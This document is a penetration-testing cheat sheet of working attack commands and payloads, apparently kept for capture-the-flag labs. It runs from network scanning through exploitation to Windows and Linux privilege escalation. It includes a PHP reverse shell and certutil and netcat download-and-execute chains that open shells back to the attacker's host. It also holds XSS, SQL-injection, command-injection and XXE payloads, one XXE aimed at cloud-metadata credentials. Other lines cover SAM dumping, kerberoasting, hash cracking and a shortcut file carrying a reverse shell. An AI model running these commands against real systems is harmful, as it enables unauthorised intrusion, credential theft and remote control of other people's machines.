# Discovery
## External
sudo nmap -Pn -n -sT "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4
sudo nmap -Pn -n -sU "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

## Internal
sudo nmap -Pn -n -sT "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4
sudo nmap -Pn -n -sU "$TARGET" -p- -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

# Enumeration
## nmap
sudo nmap -Pn -n -sC "$TARGET" -p22,80,445 -D 1.1.1.1 -g53 --min-rate 500 --max-rate 1500 --spoof-mac 6C45C4

## Web
[*] Technology
whatweb http://$TARGET

[*] WAF
wafw00f http://$TARGET

[*] Subdomain
gobuster vhost --append-domain -u $DOM -k -r -t200 -q \
-w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
| grep -oP '(?<=Found: )[^ ]+'

[*] Directory
ffuf -u http://"$TARGET"/FUZZ -t 800 -rate 20000 \
-e txt,pdf,conf,config,cnf,html,php,asp,aspx,js \
-v -recursion -recursion-depth 2 \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'

feroxbuster -u http://$TARGET \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-d 4 -k -C 404 \
-x pdf txt bak backup conf config cnf php asp aspx js \
--dont-scan '(?i)(vendor|img|.*(min|gif|css|images|png|jpg)$)'

[*] Traversal
ffuf -u 'http://$TARGET/nav.php?page=FUZZ' -t 400 -rate 10000 -v -mc 200 \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
2>/dev/null | grep -oP '(http.*)(?<!/)$'

[*] WordPress
wpscan --url http://$TARGET/wordpress --enumerate
Download source > https://develop.svn.wordpress.org/tags/x.x.x/src/

## Infrastructure
[*] LDAP
nmap --script "ldap* and not brute" -p 389 "$TARGET"
ldapsearch -H ldap://"$TARGET" -x -s base namingcontexts
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)"
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=dn: ).*' | grep -oP '(^[^@]+)'
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=userPrincipalName: ).*' | grep -oP '(^[^@]+)'
ldapsearch -H ldap://"$TARGET" -x -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" | grep -oP '(?<=description: ).*'
ldapsearch -H ldap://$DC/ -D "$DOM\P.Rosa" -w 'Rosaisbest123' -b "" -s base "(objectClass=*)" | grep -v 'supported'
ldapsearch -H ldap://$DC/ -D "$DOM\P.Rosa" -w 'Rosaisbest123' -b "DC=xxxxxx,DC=xxx" "(objectClass=*)" "*" | grep 'SAM' -B 4 -A 3

[*] Kerberos
impacket-getST -spn $DC $DOM/'USERNAME':'PASSWORD'

nano /etc/krb5.conf
[libdefaults]
default_realm = $DOM
dns_lookup_kdc = true
dns_lookup_realm = false
[realms]
$DOM = {
    kdc = $DC
    admin_server = $DC
}
[domain_realm]
.$DOM = $DOM
$DOM = $DOM

export KRB5CCNAME='/home/me/USERNAME@dc01@VINTAGE.HTB.ccache'
kinit -c '/home/me/USERNAME@dc01@VINTAGE.HTB.ccache' 'USERNAME@VINTAGE.HTB'
klist

impacket-GetADUsers -dc-host $DC -k $DOM/
impacket-GetNPUsers -usersfile usernames $DOM/ -dc-ip "$TARGET"
impacket-GetUserSPNs -request-user anna -dc-ip "$TARGET" $DOM/username:password
impacket-GetUserSPNs -no-preauth anna -usersfile usernames -dc-host "$TARGET" $DOM/
impacket-GetUserSPNs -request -dc-ip "$TARGET" $DOM/username:password

[*] bloodhound-python
bloodhound-python -c all -u 'username' -p 'password' -d "$DOM" -dc "$DC" -ns "$TARGET"
bloodhound-python -c default -u 'username' -p 'password' -d "$DOM" -dc "$DC" -ns "$TARGET"

[*] FTP
nxc ftp "$TARGET" --port 21 -u 'anonymous' -p 'anonymous' --ls
ftp "$TARGET"
anonymous
anonymous
ls -a
binary
ascii

[*] SMB
impacket-samrdump "$TARGET"
nxc smb "$TARGET" -u usernames -p passwords --rid-brute 10000
nxc smb "$TARGET" -u usernames -p passwords --shares

[*] MySQL
mysql -h "$TARGET" -u root@localhost -e 'show databases;'

[*] NFS
for x in $(showmount -e "$TARGET" | awk '{print $1}' | grep -v 'Export')
    do mkdir -p "/dev/shm"/mnt"$x"
    sudo mount -t nfs "$TARGET":"$x" "/dev/shm"/mnt"$x" -o nolock
    tree -puga "/dev/shm"/mnt"$x"
done
sudo adduser -u 1002 mntuser
sudo usermod -u 1003 mntuser
setpriv --reuid=1002 --regid=1002 --clear-groups -- ls -laR

# Exploitation
## Reverse Shell Listeners
msfconsole -q -x "use exploit/windows/misc/hta_server; set LHOST $MYIP; set SRVHOST $MYIP; run"
nc -lvnp 4444
msfconsole -q -x "use multi/handler; set LHOST $MYIP; set LPORT 4444; run"

## Web
[*] Shell
<?php
    $lhost = "$MYIP";
    $lport = 4444;
    
    exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
    $sock = fsockopen($lhost, $lport);
    if ($sock) {
        exec("sh <&3 >&3 2>&3");
        }
?>

[*] File Upload
curl --upload-file shell.php http://$TARGET:80/upload/
shell.PhP
shell.phar
shell.P.phpHP
shell%2EPHP
shell%2Ephar%00%2Epng
shell%2Ephar%00.png

[*] Traversal
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
GET /image?filename=/var/www/images/../../../etc/passwd
GET /image?filename=../../../etc/passwd%00.png

[*] XSS
<img src=x>'"${{7*7}}
<svgonload=alert(document.cookie)>
<svg/onload=alert(document.cookie)>
"onmouseover="alert(document.cookie)
javascript:alert(document.cookie)
?returnPath=javascript:alert(document.cookie)
<iframe src="https://vulnerable.site/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
{{$on.constructor('alert(document.cookie)')()}}
\"-alert(document.cookie)}//
<<<>>><img src="x"/onerror=alert(document.cookie)>
</><TAG/EVENT="">
<iframe src="https://$TARGET/?search=%22%3E%3Cbody%20onresize%3Dalert%28document%2Ecookie%29%3E" onload=this.style.width='0px'>

[*] HTTP Methods
GET
HEAD
POST
PUT
DELETE
CONNECT
OPTIONS
TRACE
PATCH

[*] Headers
X-Forwarded-For: 1

[*] sqlmap
sqlmap -r request --batch --level 3 -dbs
sqlmap -r request --batch --level 3 -D temp_db --tables
sqlmap -r request --batch --level 3 -D temp_db -T users --columns
sqlmap -r request --batch --level 3 -D temp_db -T users --columns --dump

[*] SQLi
' OR 1=1 -- #
OR 1=1 -- #
AND 1=1 -- #
' AND 1=1 -- #
administrator'-- #
' ORDER BY 1 -- #
' UNION SELECT table_name,NULL FROM information_schema.tables -- #
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users_efwvmk' -- #
' UNION SELECT username_aakuyh,password_wrukls FROM users_efwvmk -- #
' AND 1=(SELECT 1 FROM users LIMIT 1) -- #
' AND 1=(SELECT 1 FROM users WHERE username='administrator') -- #
' AND 1=(SELECT 1 FROM users WHERE username='administrator' AND LENGTH(password)=20) -- #
' AND '$x$'=(SELECT SUBSTR(password,$1$,1) FROM users WHERE username='administrator') -- #
"AND"1"="1
year=2005 ORDER BY 4
username=admin', 'password', true, '2025-02-03 15:14:29.253', 2133415744)-- #&password1=admin&password2=admin	# INSERT INTO sqlinjection004_users (username, password, isAdmin, lastLogin, lastIP)
username=target';-- # &password1=test&password2=test 

[*] Command Injection
;id #
;sleep+10;
;sleep+10;cat+/etc/passwd+>+/var/www/images/test.txt;
;cat /etc/passwd
;echo 'L2V0Yy9wYXNzd2Q=' | base64 -d | xargs cat
;cat "$(echo 'L2V0Yy9wYXNzd2Q=' | base64 -d)"
;ls -la "$(echo 'Li4vLi4vLi4vCg==' | base64 -d)"
;ls -laR "$(echo 'Li4vLi4vLi4vLi4vLi4vCg==' | base64 -d)"
logname=;cat /etc/passwd > log.txt
&amp;id

[*] XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
	<productId>&xxe;</productId>
	<storeId>1</storeId>
</stockCheck>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
<stockCheck>
	<productId>&xxe;</productId>
	<storeId>1</storeId>
</stockCheck>

productId=<xi:include xmlns:xi="http://www.w3.org/2001/XInclude" href="file:///etc/passwd" parse="text" />

Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?><x>x</x>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

[*] JWT
git clone https://github.com/wallarm/jwt-secrets.git ~/.git/jwt_secrets

hashcat -a 0 -m 16500 <JWT> ~/.git/jwt_secrets/jwt.secrets.list

[*] GraphQL
Content-Type: application/json

{  "query":"{\n\n__schema\n\n{queryType{name}}"  }

{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

{"query":"{\u000A\n\r\t__schema\u000A\n\r\t{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

/api?query=query+IntrospectionQuery+%7B%0A++%0A%0A%0A%0A%5f%5fschema%0A%0A%0A%0A+%7B%0A++++queryType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++mutationType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++subscriptionType+%7B%0D%0A++++++name%0D%0A++++%7D%0D%0A++++types+%7B%0D%0A++++++...FullType%0D%0A++++%7D%0D%0A++++directives+%7B%0D%0A++++++name%0D%0A++++++description%0D%0A++++++args+%7B%0D%0A++++++++...InputValue%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+FullType+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++description%0D%0A++fields%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++args+%7B%0D%0A++++++...InputValue%0D%0A++++%7D%0D%0A++++type+%7B%0D%0A++++++...TypeRef%0D%0A++++%7D%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++inputFields+%7B%0D%0A++++...InputValue%0D%0A++%7D%0D%0A++interfaces+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++enumValues%28includeDeprecated%3A+true%29+%7B%0D%0A++++name%0D%0A++++description%0D%0A++++isDeprecated%0D%0A++++deprecationReason%0D%0A++%7D%0D%0A++possibleTypes+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A%7D%0D%0A%0D%0Afragment+InputValue+on+__InputValue+%7B%0D%0A++name%0D%0A++description%0D%0A++type+%7B%0D%0A++++...TypeRef%0D%0A++%7D%0D%0A++defaultValue%0D%0A%7D%0D%0A%0D%0Afragment+TypeRef+on+__Type+%7B%0D%0A++kind%0D%0A++name%0D%0A++ofType+%7B%0D%0A++++kind%0D%0A++++name%0D%0A++++ofType+%7B%0D%0A++++++kind%0D%0A++++++name%0D%0A++++++ofType+%7B%0D%0A++++++++kind%0D%0A++++++++name%0D%0A++++++%7D%0D%0A++++%7D%0D%0A++%7D%0D%0A%7D%0D%0A

nano gql; gqlspection -f gql

https://datafetcher.com/graphql-json-body-converter

{  "query": "query { getUser(id: 3) { id username }}"  }

{  "query": "mutation { deleteOrganizationUser(input: {id:3}) { user { id username } }}"  }

[*] Git
git add shell.*;git commit -m 'added';git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@$TARGET:3000/$USERNAME/website.git

## Infrastructure
[*] MSHTA
msfconsole -q -x "use exploit/windows/misc/hta_server; set LHOST $MYIP; set SRVHOST $MYIP; run"
mshta.exe http://$MYIP:8080/nZzLAD.hta
sessions -i 1

[*] SSH
ssh-keygen -f sshkey -N ''; cat sshkey.pub
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINzZbkLBUl5mk0AW8lPkWRXrupSiydDr8GJauiEAu3Ze' > $TARGET ~/.ssh/authorized_keys
ssh-add -D
bob@$TARGET -i sshkey.pub
bob@$TARGET

[*] SMB
msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET; set SMBUser $USERNAME; set SMBPass $PASSWORD; set CreateSession true; run"
sessions -i 1
shares -i C$
cd programdata
upload nc.exe

impacket-smbclient $DOM/'user':'password'@$TARGET
shares
use

[*] RDP
xfreerdp /v:'$TARGET' -sec-nla /tls-seclevel:0 /dynamic-resolution +clipboard
xfreerdp /u:'bob' /p:'pass123' /v:'$TARGET' /tls-seclevel:0 /dynamic-resolution +clipboard


[*] MSSQL
netexec mssql $TARGET -u sa -p 'MSSQLP@ssw0rd!' --local-auth -X 'certutil -urlcache -f http://$MYIP:8088/runascs.exe C:\programdata\runascs.exe;certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe; certutil -urlcache -f http://$MYIP:8088/GodPotato-NET4.exe C:\programdata\GodPotato-NET4.exe; C:\programdata\runascs.exe sql_svc WqSZAF6CysDQbGb3 --logon-type 5 -b "C:\programdata\GodPotato-NET4.exe -cmd \"cmd /c C:\programdata\nc.exe -e cmd.exe $MYIP 4444\""'

netexec mssql $TARGET -u sa -p 'MSSQLP@ssw0rd!' --local-auth -X 'certutil -urlcache -f http://$MYIP:8088/runascs.exe C:\programdata\runascs.exe;certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe; certutil -urlcache -f http://$MYIP:8088/GodPotato-NET4.exe C:\programdata\GodPotato-NET4.exe; C:\programdata\runascs.exe sql_svc WqSZAF6CysDQbGb3 --logon-type 5 -b "cmd /c mshta.exe http://$MYIP:8080/cf9J5o.hta"'
sessions -i 1 -c 'C:\programdata\GodPotato-NET4.exe -cmd "cmd /c whoami /priv"'
sessions -i 1 -C 'getsystem'
sessions -i 1

[*] impacket
impacket-changepasswd -debug -dc-ip $TARGET $DC/"$USERNAME":"$PASSWORD"@$TARGET -newpass 'NewPassword123!'

# Escalation 

## Upgrade TTY
python3 -c 'import pty; pty.spawn("/bin/bash")';
CTRL-Z
stty size;stty raw -echo;fg
export SHELL=bash;
export TERM=xterm-256color;
stty rows <num> columns <num>
reset

## Linux
sudo -l
find / -perm /4000 2>/dev/null
cat /etc/crontab
netstat -tuln
ls -la /opt
grep -r -E 'conf' /var/www
cat ~/.ssh/id_rsa
cat /etc/shadow
curl $MYIP:8088/linpeas.sh | bash
su evelyn --preserve-environment
ssh bob@$TARGET -i sshkey.pub -L 33060:Localhost:33060 -L 5000:Localhost:5000
cat /etc/passwd | grep -vE 'nologin' | cut -d ':' -f '1'
find / -readable -name 'root.txt' -exec echo {} \; -exec cat {} \; 2>/dev/null

## Windows
[*] Enumeration
powershell -c "Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher"
cd C:\ & dir /S /B SAM == SYSTEM == SAM.* == SYSTEM.*
icacls C:\Windows\System32\Config
whoami /priv
cd C:\users; tree /f
wmic useraccount get name,sid
powershell -c "Set-ExecutionPolicy unrestricted"

[*] SeBackupPrivilege
robocopy /b \Users\Administrator\Desktop .

[*] File Transfer
python3 -m http.server -d Downloads/upload/windows 8088
powershell -c "certutil -urlcache -f http://$MYIP:8088/winpeas.exe C:\programdata\winpeas.exe"
powershell -c "certutil -urlcache -f http://$MYIP:8088/nc.exe C:\programdata\nc.exe"

[*] SAM
nxc winrm $TARGET -u '$USERNAME' -p '$PASSWORD' --sam --dump-method powershell

cd c:\programdata; reg save hklm\sam SAM; reg save hklm\system SYSTEM;
download SAM
download SYSTEM
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
echo 'Administrator:500:...................' > hashes
hashcat -m 1000 -a 0 hashes rockyou

[*] Rubeus
Rubeus.exe kerberoast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5tgs
Rubeus.exe asreproast
nano hashes; cat hashes | awk '{$1=$1}1' | tr -d '\n' | tee hashes; john hashes -w=rockyou --format=krb5asrep

[*] evil-winrm
evil-winrm -i "$TARGET" -u 'username' -p 'password'
evil-winrm -i "$TARGET" -u 'username' -H 'hash'

[*] url / .lnk exploits
click.url
[InternetShortcut]
URL=C:\programdata\shell.bat

[Notepad.lnk - Inject Reverse Shell]
powershell "$s=(New-Object -COM WScript.Shell).CreateShortcut('C:\Common Applications\Notepad.lnk');$s.TargetPath='C:\Windows\System32\cmd.exe';$s.Arguments='/c \"C:\ProgramData\nc.exe $MYIP 4444 -e cmd\"';$s.Save()"

[*] Metasploit
meterpreter > use priv
meterpreter > getsystem

[*] Powerview
powershell -c "certutil -urlcache -f http://$MYIP:8088/powerview.ps1 C:\programdata\powerview.ps1"
powershell Import-Module C:\programdata\powerview.ps1
Get-NetDomain
Get-LocalUser
Set-DomainObject -Identity USERNAME -SET @{serviceprincipalname='SET/SET'}; Get-DomainSPNTicket -spn SET/SET
